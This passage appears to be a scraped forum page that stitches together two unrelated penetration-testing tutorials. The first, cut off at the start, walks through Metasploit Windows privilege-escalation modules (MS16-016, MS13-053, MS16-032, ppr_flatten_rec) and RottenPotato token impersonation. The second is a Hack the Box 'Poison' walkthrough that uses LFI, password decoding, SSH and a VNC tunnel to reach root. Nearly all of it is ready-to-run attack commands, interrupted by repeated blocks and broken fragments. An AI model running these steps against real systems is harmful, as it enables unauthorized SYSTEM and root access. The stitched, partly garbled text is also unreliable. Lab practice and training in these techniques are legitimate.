set session 1
exploit
1
2
3
4
use exploit/windows/local/ms16_016_webdav
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
1
2
getsystem
getuid
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 5.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-iw1y3u6GH1M/W5X9evbEaeI/AAAAAAAAaNg/3QcpMpIN05ovTwktiPuk6zVqyLOUsfHjQCEwYBhgL/s1600/5.png?w=687)
EPATHOBJ::pprFlattenRec Local Privilege Escalation
This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory.
At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ppr_flatten_rec
set lhost 192.168.1.107
set session 1
exploit
1
2
3
4
use exploit/windows/local/ppr_flatten_rec
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
1
2
getsystem
getuid
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 6.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-50JEITNrWAg/W5X9e6spKLI/AAAAAAAAaNo/PJNJTAojY-gLRGgb_4uUWcvGM-xlfI-dACEwYBhgL/s1600/6.png?w=687)
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
A kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome’s sandbox. NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
At the moment, the module has been tested successfully on Windows 7 SP1 x86
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms13_053_ schlamperei
set lhost 192.168.1.107
set session 1
exploit
1
2
3
4
use exploit/windows/local/ms13_053_ schlamperei
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
1
2
getsystem
getuid
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 7.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-XINCEa0_D58/W5X9fGJI9hI/AAAAAAAAaNk/45xBBBPUChAT9vj5mil5-6hn204WZmIMgCEwYBhgL/s1600/7.png?w=687)
MS16-032 Secondary Logon Handle Privilege Escalation
This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
exploit
1
2
3
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
1
2
getsystem
getuid
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 8.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-P1arpdUb6W0/W5X9fU2tK1I/AAAAAAAAaNo/IgS6EQNIgusnGBrRmrvNloR8dXCVECmJQCEwYBhgL/s1600/8.png?w=687)
RottenPotato
RottenPotato local privilege escalation from service account to SYSTEM.
It is important to impersonate the token (or run list_tokens -u) quickly after running the binary. With the current implementation, the token seems to disappear shortly after the binary is run. It is also important to follow the order of the steps. Make sure you “use incognito” before running the binary.
Incognito option in the meterpreter session was originally a stand-alone application that permitted you to impersonate user tokens when successfully compromising a system. And then we need to do first is identify if there are any valid tokens on this system.
load incognito
list_tokens -u
1
2
load incognito
list_tokens -u
If we talk related to impersonate token then you can see currently there is no token available.
![[Image: 23.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-jvqLb_hkAKY/WvHAyYuuwLI/AAAAAAAAWxc/To2KOzpvQuk2vV9BhIeVtf0yrmrWPmv-wCLcBGAs/s1600/23.png?w=687)
Now downloads Rottenpotato from GitHub for privilege escalation.
git clone //github.com/foxglovesec/RottenPotato.git
cd RottenPotato
1
2
git clone //github.com/foxglovesec/RottenPotato.git
cd RottenPotato
After downloading it will give rottenpotato.exe file.
Upload the exe file into the victim’s machine
upload /root/Desktop/RottenPotato/rottenpotato.exe .
1
upload /root/Desktop/RottenPotato/rottenpotato.exe .
![[Image: 24.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-DSMHJCIuauc/WvHAyk4CtmI/AAAAAAAAWxg/lx-2mzCBgG4cZ8veWoztGTe0PgRslm11wCLcBGAs/s1600/24.png?w=687)
Now type below command for executing exe file and then add SYSTEM token under impersonate user tokens.
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
1
2
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM
![[Image: 25.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-d0Fw4LlIplo/WvHAzKr2FhI/AAAAAAAAWxk/7u57iMzI5-chBzetF-j0h99qHC9bH7bgwCLcBGAs/s1600/25.png?w=687)
Hello everyone and welcome to yet another CTF challenge from Hack the Box, called ‘Poison,’ which is available online for those who want to increase their skills in penetration testing and black box testing. Poison is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level.
Level: Easy
Task: Find user.txt and root.txt in the victim’s machine
Methodology:
- Port scanning
- Using LFI to find the username
- Gaining encrypted password file using LFI
- Decrypting password file
- Logging in to SSH using a decrypted password
- Transferring ZIP file and extracting to find a secret file
- Discovery of VNC on the machine
- VNC tunneling over SSH to get a root shell
- Grabbing flag
Since these labs have a static IP, the IP address for poison is 10.10.10.84. Let us scan the VM with the most popular port scanning tool, nmap.
nmap -A 10.10.10.84
1
nmap -A 10.10.10.84
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-HTJoUo0_wsk/W5QI3HGkOLI/AAAAAAAAaKI/0LkjsJ5WHQQiwXrlqbKDS1i379mrnLmDACEwYBhgL/s1600/1.png?w=687&ssl=1)
From the result above we found two working ports on the VM, port 22 and 80 which are universal default ports for SSH and HTTP.
We immediately headed over to the web page.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-f_EWGI2zc_A/W5QI5Tf0dPI/AAAAAAAAaKk/eUrHTThaqKAgEmnTRaYi70qZPXiYG5w0gCEwYBhgL/s1600/2.png?w=687&ssl=1)
It was crystal clear only by reading that there was an LFI vulnerability involved. We tested it by inputting /etc/passwd in the script name section.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-w9e0or2f_UI/W5QI5gzaEDI/AAAAAAAAaKo/lzwZckSk4joHA1kqpmlBmHhKna9k83lMQCEwYBhgL/s1600/3.png?w=687&ssl=1)
Which led us to the following output
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-jreCi41jVCY/W5QI6DG9qQI/AAAAAAAAaKw/x3ZmeiFdJO89yNu1VRjirESW4btM5C1wACEwYBhgL/s1600/4.png?w=687&ssl=1)
From here we found that the username was “charix.” But before moving on to that part we tried all the script names one by one given in the previous web page.
It was going all monotonous until we found an interesting text file in the “listfiles.php” script.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-NmTvKW0mKLs/W5QI55ZRC-I/AAAAAAAAaLQ/io3Brf2ENpkDIFWUg1PYD--aYLV2zd83gCEwYBhgL/s1600/5.png?w=687&ssl=1)
The listfiles.php was a script that enumerated an array of the files
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-szS8-TfVMCQ/W5QI6ocRwDI/AAAAAAAAaLU/kfYq1e8vRoosZJexvHmkAUYVrItFMsIYwCEwYBhgL/s1600/6.png?w=687&ssl=1)
We found an interesting file called pwdbackup.txt. On opening it by the same process we found an encrypted password.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Bm9L2fHHK1A/W5QI7X5-fiI/AAAAAAAAaLY/SisOZY7BCvIFVXLrl0oqz7jM44gs2cZEACEwYBhgL/s1600/7.png?w=687&ssl=1)
But it wasn’t normal encryption, the password was encrypted 13 times. Just by looking we could tell that it was base64 encoding. So, we copied the password in a notepad file and removed the spaces between the password’s lines (present by default) and wrote the following command to decrypt it:
cat decode | base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 –d
1
cat decode | base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 –d
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-BnXWVE6Q3lI/W5QI7VcW4EI/AAAAAAAAaLY/IP05ec4UF1Mrz5q7BXkRxH_53DWSfX7FQCEwYBhgL/s1600/8.png?w=687&ssl=1)
Voila! The password was found to be Charix!2#4%6&8(0
A complete logical shot in the dark was that it was the password to secure shell of the victim. So, we tried logging in to SSH.
ssh [email protected]
ls
1
2
ssh [email protected]
ls
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-0P7yDby5N5g/W5QI7RR5nOI/AAAAAAAAaLU/gMlr3yL0mRUjnw_1hbPscw31A6cCqJdtQCEwYBhgL/s1600/9.png?w=687&ssl=1)
And just like that, we were logged in! We found the first flag (user.txt) and another file called secret.zip
We tried unzipping it on the spot but it didn’t work. So, instead, we transferred the file to our system using scp (read how to transfer using SCP
[To see content please register here]
)scp [email protected]
ecret.zip /root/Desktop/cd Desktop
unzip secret.zip
1
2
3
scp [email protected]
ecret.zip /root/Desktop/cd Desktop
unzip secret.zip
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-uYaA4j9zYX0/W5QI3K10s3I/AAAAAAAAaLE/0MQTMaOLkGYkBXIbB99H0dYQMN6uu9wMwCEwYBhgL/s1600/10.png?w=687&ssl=1)
We got a file “secret” which could be the password of another service.
We were far from convinced that no other service was running so we scanned the victim using socat. (To read more:
[To see content please register here]
)sockstat -4 -l
1
sockstat -4 -l
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-BljkGNAbdkQ/W5QI4LstcuI/AAAAAAAAaLQ/Bd3xeXp3FzY4pK-sRoMdZJciLkyuR2qFQCEwYBhgL/s1600/11.png?w=687&ssl=1)
Port number 5901 and 5908 were open which clearly are the port numbers for VNC! This could be our way in.
We followed the SSH tunneling methodology (refer
[To see content please register here]
)ssh -L 5901:127.0.0.1:5901 [email protected]
1
ssh -L 5901:127.0.0.1:5901 [email protected]
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Cc0zkjhygPY/W5QI4WIpU7I/AAAAAAAAaLI/81esUzLyLcUgDNKVVzbmeLGYpIVC5BO8gCEwYBhgL/s1600/12.png?w=687&ssl=1)
IT will open up a shell. In a new terminal write:
vncviewer -passwd secret 127.0.0.1:5901
1
vncviewer -passwd secret 127.0.0.1:5901
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-O7TVy_KQRoU/W5QI4g8tOdI/AAAAAAAAaLM/U7JkbBCnnBQr8dnq0VNb3XR9mNltikC7QCEwYBhgL/s1600/13.png?w=687&ssl=1)
We saw an authentication successful tag!
What was left now but to:
ls
cat root.txt
1
2
ls
cat root.txt
And this is how we owned the poison VM. Hope you enjoyed because we sure did!
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-qUxjjSWk8Lk/W5QI5CVMoWI/AAAAAAAAaLQ/qUmB3wxgzFgrA4xiB8FFVLWzqXcTJuvQgCEwYBhgL/s1600/14.png?w=687&ssl=1)
Author: Harshit R
